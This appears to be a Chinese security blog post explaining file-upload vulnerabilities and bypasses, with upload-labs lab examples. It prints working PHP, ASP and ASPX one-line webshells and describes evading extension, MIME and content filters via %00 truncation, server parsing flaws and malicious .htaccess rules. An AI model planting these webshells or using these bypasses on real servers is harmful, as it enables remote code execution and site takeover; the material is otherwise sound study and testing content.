<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/logo.jpg?v=2.1.1" type="image/png" sizes="16x16"><link rel="icon" href="/images/logo.jpg?v=2.1.1" type="image/png" sizes="32x32"><meta name="description" content="文件上传漏洞                           1. 前言       https:&#x2F;&#x2F;blog.csdn.net&#x2F;weixin_45798017&#x2F;article&#x2F;details&#x2F;105243611 大小马 检测：文件类型 &#x2F; 文件大小 &#x2F; 文件内容 常见的一句话木马： 123&lt;?php @eval($_POST[&amp;#x27;shell&amp;#x27;])">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传漏洞">
<meta property="og:url" content="https://sculptor-liu.github.io/2021/04/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Sculptor&#39;s blog">
<meta property="og:description" content="文件上传漏洞                           1. 前言       https:&#x2F;&#x2F;blog.csdn.net&#x2F;weixin_45798017&#x2F;article&#x2F;details&#x2F;105243611 大小马 检测：文件类型 &#x2F; 文件大小 &#x2F; 文件内容 常见的一句话木马： 123&lt;?php @eval($_POST[&amp;#x27;shell&amp;#x27;])">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-04-26T13:20:27.000Z">
<meta property="article:modified_time" content="2021-04-26T13:22:36.179Z">
<meta property="article:author" content="Sculptor">
<meta property="article:tag" content="文件上传">
<meta name="twitter:card" content="summary"><title>文件上传漏洞 | Sculptor's blog</title><link ref="canonical" href="https://sculptor-liu.github.io/2021/04/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@latest/dist/gitalk.min.css" type="text/css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.1.1"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":true},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: true,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.1.1"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">分类</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/friends/"><span class="header-nav-menu-item__icon"><i class="fas fa-link"></i></span><span class="header-nav-menu-item__text">友链</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/about/"><span class="header-nav-menu-item__icon"><i class="fas fa-info-circle"></i></span><span class="header-nav-menu-item__text">关于我</span></a></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">搜索</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Sculptor's blog</div><div class="header-banner-info__subtitle">不知名的陌生人</div></div><div class="header-banner-arrow"><div class="header-banner-arrow__icon"><i class="fas fa-angle-down"></i></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">文件上传漏洞</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2021-04-26</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2021-04-26</span></span><span class="post-meta-item post-meta-item--visitors"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value" id="busuanzi_value_page_pv"></span></span></div></header><div class="post-body">
        <h1 id="文件上传漏洞">
          <a href="#文件上传漏洞" class="heading-link"><i class="fas fa-link"></i></a>文件上传漏洞</h1>
      
        <h2 id="1-前言">
          <a href="#1-前言" class="heading-link"><i class="fas fa-link"></i></a>1. 前言</h2>
      <p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45798017/article/details/105243611">https://blog.csdn.net/weixin_45798017/article/details/105243611</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><strong>大小马</strong></p>
<p><strong>检测：文件类型 / 文件大小 / 文件内容</strong></p>
<p><strong>常见的一句话木马：</strong></p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>($_POST[<span class="string">&#x27;shell&#x27;</span>]);<span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">// @符号，其实这个东西对我们来说可有可无，这个符号的作用是抵制错误提示。</span></span><br><span class="line"><span class="comment">// $_POST[&quot;shell&quot;]，则是从post请求中寻找shell参数，将shell参数的值，作为命令语句执行。</span></span><br></pre></td></tr></table></div></figure>

<a id="more"></a>

<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 为什么要抵制错误提示呢？这里先要了解eval（）函数的功能。eval将接收一个字符串参数，并将这个字符串作为命令语句执行。</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hello&quot;</span>;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&#x27;echo &quot;hello&quot;&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//这两句的功能是相同的，因为eval接收的是个字符串，那这个字符串就有可能不是正确的命令。这样一来直接执行就会报错，为了不显示报错信息，前面加上了@符号。</span></span><br><span class="line"><span class="comment">//@一般是创建网站的人才会使用，旨在不让用户从报错信息中获得服务器的相关信息。而我们对一句话进行利用时，有时还是需要报错信息来告诉我们，哪里输错了。</span></span><br></pre></td></tr></table></div></figure>


        <h2 id="2-前端检测">
          <a href="#2-前端检测" class="heading-link"><i class="fas fa-link"></i></a>2. 前端检测</h2>
      <p>前端一般都是使用js来限制我们的上传类型和文件大小，这里以upload-labs Pass-01的源码为例：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> file = document.getElementsByName(<span class="string">&#x27;upload_file&#x27;</span>)[<span class="number">0</span>].value;</span><br><span class="line">    <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">&quot;&quot;</span>) &#123;</span><br><span class="line">        alert(<span class="string">&quot;请选择要上传的文件!&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line">    <span class="keyword">var</span> allow_ext = <span class="string">&quot;.jpg|.png|.gif&quot;</span>;</span><br><span class="line">    <span class="comment">//提取上传文件的类型</span></span><br><span class="line">    <span class="keyword">var</span> ext_name = file.substring(file.lastIndexOf(<span class="string">&quot;.&quot;</span>));</span><br><span class="line">    <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line">    <span class="keyword">if</span> (allow_ext.indexOf(ext_name + <span class="string">&quot;|&quot;</span>) == <span class="number">-1</span>) &#123;</span><br><span class="line">        <span class="keyword">var</span> errMsg = <span class="string">&quot;该文件不允许上传，请上传&quot;</span> + allow_ext + <span class="string">&quot;类型的文件,当前文件类型为：&quot;</span> + ext_name;</span><br><span class="line">        alert(errMsg);</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>对于前端的检测我们可以抓包来修改文件类型，也可以禁用掉JavaScript。总之，只有前端的限制是非常不安全的，非常容易被绕过。</p>

        <h2 id="3-后端检测">
          <a href="#3-后端检测" class="heading-link"><i class="fas fa-link"></i></a>3. 后端检测</h2>
      
        <h3 id="3-1-检测Content-type">
          <a href="#3-1-检测Content-type" class="heading-link"><i class="fas fa-link"></i></a>3.1 检测Content-type</h3>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>( ( $uploaded_type == <span class="string">&quot;image/jpeg&quot;</span> || $uploaded_type == <span class="string">&quot;image/png&quot;</span> ) ) &#123;</span><br></pre></td></tr></table></div></figure>

<p><strong>绕过方法：</strong></p>
<p>抓包将<code>content-type</code>改为图片形式（即’image/jpeg’等），即可成功上传</p>

        <h3 id="3-2-检测文件头判断文件类型">
          <a href="#3-2-检测文件头判断文件类型" class="heading-link"><i class="fas fa-link"></i></a>3.2 检测文件头判断文件类型</h3>
      <p>此时虽然检查的也是文件类型，但是是使用<code>getimagesize()</code>函数来获取文件的MIME类型，此时检测的不是数据包中的<code>content-type</code>，而是图片的文件头，常见的图片文件头如下：</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">8950 4E47       png文件标识</span><br><span class="line">FFD8 FFE0       jpg文件标识</span><br><span class="line">FFD8 FFE1       jpeg文件标识（也是图片）</span><br><span class="line">4749 4638       gif文件标识</span><br></pre></td></tr></table></div></figure>

<p><strong>绕过方法：</strong></p>
<p>当上传php文件时，可以使用<strong>winhex</strong>、<strong>010editor</strong>等十六进制处理工具，在数据最前面添加图片的文件头，从而绕过检测。</p>
<p>或者，在文件最后添加jpg的标识，例如：<code>shell.php.jpg</code>(但是这种方法可能导致文件无法正常执行,这个也是低版本apache扩展名解析特性，下面也有讲到)</p>

        <h3 id="3-3-检测文件扩展名">
          <a href="#3-3-检测文件扩展名" class="heading-link"><i class="fas fa-link"></i></a>3.3 检测文件扩展名</h3>
      
        <h4 id="3-3-1-黑名单检测">
          <a href="#3-3-1-黑名单检测" class="heading-link"><i class="fas fa-link"></i></a>3.3.1 黑名单检测</h4>
      <figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;php&#39;, &#39;asp&#39;, &#39;aspx&#39;, &#39;jsp&#39;,&#39; jspx&#39;, &#39;jspf&#39;, &#39;asa&#39;, &#39;cer&#39;,</span><br></pre></td></tr></table></div></figure>

<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">php的一句话木马： <span class="meta">&lt;?php</span> @<span class="keyword">eval</span>($_POST[<span class="string">&#x27;shell&#x27;</span>]);<span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">asp的一句话是： &lt;%<span class="keyword">eval</span> request (<span class="string">&quot;pass&quot;</span>)%&gt;</span><br><span class="line"></span><br><span class="line">aspx的一句话是： &lt;%@ Page Language=<span class="string">&quot;Jscript&quot;</span>%&gt; &lt;%<span class="keyword">eval</span>(Request.Item[<span class="string">&quot;pass&quot;</span>],<span class="string">&quot;unsafe&quot;</span>);%&gt;</span><br></pre></td></tr></table></div></figure>

<p>但是使用黑名单是非常不安全的，很多网站会使用扩展名黑名单来限制上传文件类型，有些甚至在判断时都不用<code>strtolower()</code>来处理，因此造成漏洞</p>
<p><strong>绕过方法：</strong></p>
<ol>
<li>使用一些特殊扩展名来绕过（如php可以使用php3、php4、php5、php7、 phtml、phps、pht等来代替）</li>
<li>在后端比较没有转换大小写处理时，使用大小写混淆（如将php改为pHp等）来绕过</li>
</ol>

        <h4 id="3-3-2-白名单检测">
          <a href="#3-3-2-白名单检测" class="heading-link"><i class="fas fa-link"></i></a>3.3.2 白名单检测</h4>
      <p>白名单相对与黑名单就安全许多，要求只能是特定扩展名的文件才能上传，虽然我们无法从代码层面来绕过，但这样也不是绝对的安全，可以利用其他漏洞来绕过；</p>
<p><strong>绕过方法：</strong></p>
<ol>
<li>使用%00截断文件名来上传（后面会讲）</li>
<li>如果目标还存在文件包含漏洞，那么就可以上传图片马再文件包含来拿shell</li>
</ol>

        <h3 id="3-4-检测文件内容">
          <a href="#3-4-检测文件内容" class="heading-link"><i class="fas fa-link"></i></a>3.4 检测文件内容</h3>
      
        <h4 id="3-4-1-文件内容替换">
          <a href="#3-4-1-文件内容替换" class="heading-link"><i class="fas fa-link"></i></a>3.4.1 文件内容替换</h4>
      <p>这种主要是将文件中的敏感字符替换掉，具体问题具体分析。</p>
<p><strong>绕过方法：</strong></p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//一句话木马</span></span><br><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>($_POST[<span class="string">&#x27;shell&#x27;</span>]);<span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">&lt;script language=<span class="string">&#x27;php&#x27;</span>&gt;<span class="keyword">eval</span>($_POST[<span class="string">&#x27;shell&#x27;</span>]);&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script language=<span class="string">&#x27;php&#x27;</span>&gt;assert($_REQUEST[<span class="string">&#x27;shell&#x27;</span>])&lt;/script&gt;</span><br></pre></td></tr></table></div></figure>


        <h4 id="3-4-2-图片二次渲染">
          <a href="#3-4-2-图片二次渲染" class="heading-link"><i class="fas fa-link"></i></a>3.4.2 图片二次渲染</h4>
      <p>后端调用了php的GD库，提取了文件中的图片数据，然后再重新渲染，这样图片中插入的恶意代码就会被过滤掉了。</p>
<p>在测试时发现不管是直接修改文件头来制作的图片马，还是利用<code>copy</code>命令制作的图片马，都无法避免其中的一句话被过滤掉。</p>
<p>而看了一篇文章发现其实要把一句话插入到图片数据中，这样经过渲染后这部分数据还是会保留下来。大家可以看一下作为参考：<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://secgeek.net/bookfresh-vulnerability/">https://secgeek.net/bookfresh-vulnerability/</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h2 id="4-解析漏洞">
          <a href="#4-解析漏洞" class="heading-link"><i class="fas fa-link"></i></a>4. 解析漏洞</h2>
      
        <h3 id="4-1-IIS解析漏洞">
          <a href="#4-1-IIS解析漏洞" class="heading-link"><i class="fas fa-link"></i></a>4.1 IIS解析漏洞</h3>
      
        <h4 id="IIS6-0">
          <a href="#IIS6-0" class="heading-link"><i class="fas fa-link"></i></a>IIS6.0</h4>
      <p>在IIS6.0中有两个很重要的asp解析漏洞：</p>
<ol>
<li>假设当前有一个名为”xxx.asp”的目录，那么该目录下的所有文件都将被作为asp文件解析</li>
<li>假设上传一个名为”test.asp;xxx.jpg”时，该文件会被当做asp文件解析</li>
</ol>

        <h4 id="IIS7-5">
          <a href="#IIS7-5" class="heading-link"><i class="fas fa-link"></i></a>IIS7.5</h4>
      <p>这个其实不能算IIS的洞，它其实是php的解析漏洞，这个漏洞利用条件是服务器在<code>php.ini</code>中将<code>cgi.fix_pathinfo</code>的值设置为1</p>
<p>然后当我们访问服务器上任意一个文件时（如：<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://test.com/a.jpg%EF%BC%89%EF%BC%8C%E5%BD%93%E6%88%91%E4%BB%AC%E5%9C%A8URL%E5%90%8E%E9%9D%A2%E6%B7%BB%E5%8A%A0%60.php%60%EF%BC%88%E5%8D%B3%EF%BC%9Ahttp://test.com/a.jpg/.php%EF%BC%89%EF%BC%8C%E9%82%A3%E4%B9%88%E6%96%87%E4%BB%B6a.jpg%E5%B0%B1%E5%B0%86%E8%A2%AB%E4%BD%9C%E4%B8%BAphp%E6%96%87%E4%BB%B6%E6%9D%A5%E8%A7%A3%E6%9E%90">http://test.com/a.jpg），当我们在URL后面添加`.php`（即：http://test.com/a.jpg/.php），那么文件a.jpg就将被作为php文件来解析</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h3 id="4-2-Apache解析漏洞">
          <a href="#4-2-Apache解析漏洞" class="heading-link"><i class="fas fa-link"></i></a>4.2 Apache解析漏洞</h3>
      
        <h4 id="利用低版本apache扩展名解析特性">
          <a href="#利用低版本apache扩展名解析特性" class="heading-link"><i class="fas fa-link"></i></a>利用低版本apache扩展名解析特性</h4>
      <p>在了解这个解析漏洞之前，我们要首先了解apache和php的三种结合方式：</p>
<blockquote>
<p>Apache和php三种结合方式：</p>
<p>1.CGI</p>
<p>2.Module</p>
<p>3.FastCGI</p>
</blockquote>
<p>该解析漏洞只有在apache和php以Module方式结合时才存在，而且Apache还有一个特性：</p>
<blockquote>
<p>Apache在解析文件时会以文件名从右向左解析，当最后一个扩展名无法识别时，就会向左查看是否有可以识别的文件名，如果没有的话就以配置中的默认文件类型来解析</p>
<p>例如：</p>
<p>a.php.xxx因为xxx无法识别，而左边的php可识别，就会被解析为php文件</p>
</blockquote>
<p>因此，如果上传文件名为a.php.xxx的一句话，访问后就很可能拿到shell</p>

        <h4 id="CVE-2017-15715">
          <a href="#CVE-2017-15715" class="heading-link"><i class="fas fa-link"></i></a>CVE-2017-15715</h4>
      <p>还有一个apache的解析漏洞就是<code>CVE-2017-15715</code>，这个漏洞利用方式就是上传一个文件名最后带有换行符(只能是<code>\x0A</code>，如上传a.php，然后在burp中修改文件名为<code>a.php\x0A</code>)，以此来绕过一些黑名单过滤</p>
<p>具体的漏洞分析可以看p牛：<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html">https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h3 id="4-3-00截断">
          <a href="#4-3-00截断" class="heading-link"><i class="fas fa-link"></i></a>4.3 %00截断</h3>
      <p>这个多数被利用在截断路径，利用的条件是：</p>
<blockquote>
<p>PHP &lt; 5.3.4</p>
<p>magic_quotes_gpc 关闭</p>
</blockquote>
<p>因为<code>0x00</code>是字符串的结束标志符，所以php在读取到<code>0x00</code>时就不会再往后读取，我们可以利用这些截断字符后面不需要的内容。</p>
<p>以upload-labs的Pass-12为例，源码如下：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="literal">false</span>;</span><br><span class="line">$msg = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">$ext_arr = <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;png&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>);</span><br><span class="line">$file_ext = substr($_FILES[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>],strrpos($_FILES[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>],<span class="string">&quot;.&quot;</span>)+<span class="number">1</span>);</span><br><span class="line"><span class="keyword">if</span>(in_array($file_ext,$ext_arr))&#123;</span><br><span class="line">$temp_file = $_FILES[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">$img_path = $_POST[<span class="string">&#x27;save_path&#x27;</span>].<span class="string">&quot;/&quot;</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">&quot;YmdHis&quot;</span>).<span class="string">&quot;.&quot;</span>.$file_ext;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path))&#123;</span><br><span class="line">$is_upload = <span class="literal">true</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">$msg = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line">&#125; <span class="keyword">else</span>&#123;</span><br><span class="line">$msg = <span class="string">&quot;只允许上传.jpg|.png|.gif类型文件！&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>由于是白名单限制了上传文件类型，因此我们无法在文件名处做文章。但最终<code>move_uploaded_file()</code>的目标目录是我们可控的，我们可以将POST传入的<code>save_path</code>改为<code>../upload/shell.php%00</code>，这样后面的内容就会被截断掉，这就导致了任意文件上传。</p>
<p>还要注意的是<code>%00</code>是url编码，在以POST传参时应该使用burpsuite对其进行url decode，或者修改hex值为00；而当GET传参时因为浏览器会做一遍url decode，所以直接传<code>%00</code>即可。</p>

        <h3 id="4-5-htaccess解析">
          <a href="#4-5-htaccess解析" class="heading-link"><i class="fas fa-link"></i></a>4.5 .htaccess解析</h3>
      <blockquote>
<p>.htaccess文件(或者”分布式配置文件”）,全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。</p>
</blockquote>
<p>利用.htaccess的条件：Apache中配置<code>AllowOverride All</code></p>
<p>打开apache的http.conf文件找到的<code>AllowOverride None</code>，将其改为<code>AllowOverride All</code></p>
<p>.htaccess文件可以配置将特定的文件按规定的文件类型进行解析，可以用以下两种方式来配置：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch <span class="string">&quot;test&quot;</span>&gt;</span><br><span class="line">  SetHandler application/x-httpd-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></div></figure>

<p>这一种采用正则匹配，只要文件名为test的文件都将被作为php文件解析</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php .jpg</span><br></pre></td></tr></table></div></figure>

<p>第二种是将.jpg文件都作为php文件解析</p>
<p>这样我们如果能将.htaccess上传到服务器的话，就可以再根据我们自己设定的规则来解析上传的文件，以此来绕过上传过滤。</p>

        <h2 id="5-总结">
          <a href="#5-总结" class="heading-link"><i class="fas fa-link"></i></a>5. 总结</h2>
      <p>常见的文件上传的检测和绕过方式基本是以上几种。在实战或CTF比赛中往往是几种类型的结合，因此绕过也需要几种方式的结合。</p>
<p>首先我认为最重要的是前期的信息收集，服务器的类型、版本，使用的脚本语言、版本，只要做到对这些很清楚后才能考虑之后能否利用一些如%00截断、服务器解析漏洞来进行文件上传。</p>
<p>在测试时，一般我们都先要fuzz看一下检测是哪种类型，是前端还是后端？黑名单还是白名单？上传后的shell能否被成功执行？是否有文件内容的检测？</p>
<p>如果是黑名单的话，就要尝试各种特殊文件名（php、Php、PHP、pht、php5、phtml），或者在扩展名后添加空格、::$DATA、.等字符，再或者是尝试上传.htaccess</p>
<p>如果是白名单，就要看是否可以使用%00截断，或者利用服务器的解析漏洞。如果真的过滤很死的话，不妨再找一下目标的文件包含漏洞，尝试利用文件包含来解析图片马。</p>
<p>个人认为现在文件上传在代码层除了逻辑问题外已经很少有漏洞了，大多数情况下都是利用服务器解析漏洞等来getshell。</p>
<p>参考：<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://www.hulingweb.cn/hulianwang/1003.html">https://www.hulingweb.cn/hulianwang/1003.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://www.cnblogs.com/loopkep/p/12101247.html">https://www.cnblogs.com/loopkep/p/12101247.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://blog.csdn.net/broing55/article/details/104720711">https://blog.csdn.net/broing55/article/details/104720711</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41500251/article/details/100177972">https://blog.csdn.net/qq_41500251/article/details/100177972</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="https://sculptor-liu.github.io">Sculptor</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="https://sculptor-liu.github.io/2021/04/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">https://sculptor-liu.github.io/2021/04/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-cn" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://sculptor-liu.github.io/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">文件上传</a></span></div><div class="post-share"><div class="social-share" data-sites="qzone, qq, weibo, wechat, douban, linkedin, facebook, twitter, google">Share to: </div></div><div class="post-reward reward"><div class="reward-button">请我喝杯咖啡~</div><div class="reward-qrcode"><span class="reward-qrcode-alipay"><img class="reward-qrcode-alipay__img" src="/images/ali_pay.png"><div class="reward-qrcode-alipay__text">支付宝打赏</div></span><span class="reward-qrcode-wechat"><img class="reward-qrcode-wechat__img" src="/images/wechat_pay.png"><div class="reward-qrcode-wechat__text">微信打赏</div></span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2021/04/26/Ubuntu%E4%B8%ADiptables%E9%85%8D%E7%BD%AE/"><span class="paginator-prev__icon"><i 